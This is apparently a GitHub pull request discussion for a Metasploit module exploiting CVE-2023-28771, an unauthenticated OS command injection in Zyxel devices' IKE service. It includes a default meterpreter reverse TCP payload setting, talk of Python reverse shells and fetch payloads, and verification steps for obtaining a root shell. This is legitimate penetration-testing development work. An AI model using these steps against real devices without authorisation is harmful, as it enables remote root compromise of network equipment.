New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
CVE-2023-28771 - Zyxel Command Injection #18016
Conversation
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Amazing work!
Thanks for the awesome module @sfewer-r7! Would you be able to include a pcap of the module running / exploiting the physical device? This would really help whoever ends up reviewing and landing this, cheers. |
Thanks @jheysel-r7 , attached is a PCAP for the following session:
|
'DefaultOptions' => { | ||
'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp' | ||
} | ||
} |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This should be able to be replaced with the new fetch payloads, however right now it's infeasible because we don't have a MIPS64 adapter. I'll see about adding one and then we can rebase this once that's done to include it.
This is cursed, but the Python Meterpreter payload might work here. I've been toying around with the exploit a little, and something like the following (Python) works... I've been playing with ever more lengthy python reverse shells/whatnot, but there is no reason a Python Meterpreter won't work.
|
…ved the seperate command and dropper targets in favor of a single default target which can do both thanks to fetch payloads. Removed the redundant IO select() call which was bad copy pasta on my part.
Hi @zeroSteiner I have rebased this pull request and reworked the module to support the fetch payloads. Tested and works great with a I have attached a PCAP cve_2023_28771.fetch.pcapng.zip of that working. |
Release NotesThis adds an exploit for CVE-2023-28771 which is a remote, unauthenticated OS command injection in IKE service of several Zyxel devices. Successful exploitation results in remote command execution as the |
This module exploits CVE-2023-28771, a remote unauthenticated command injection vulnerability in the Internet Key Exchange (IKE) packet decoder over UDP port 500 on the WAN interface of several Zyxel devices. For a full technical analysis of the vulnerability read the Rapid7 AttackerKB Analysis.
Testing
A physical device is required for testing. The device must be running a vulnerable firmware version prior to the
vendor patch. A Zyxel USG FLEX 100 device was used during development and testing of this Metasploit module.
The attacker must be able to send UDP data to port 500 on the WAN interface of the affected network device.
Verification Steps
use exploit/linux/misc/zyxel_ike_decoder_rce_cve_2023_28771
set RHOST <TARGET_WAN_IP>
set LHOST eth0
check
exploit
0
is acmd/unix/reverse_bash
payload. A root command shell session should be created.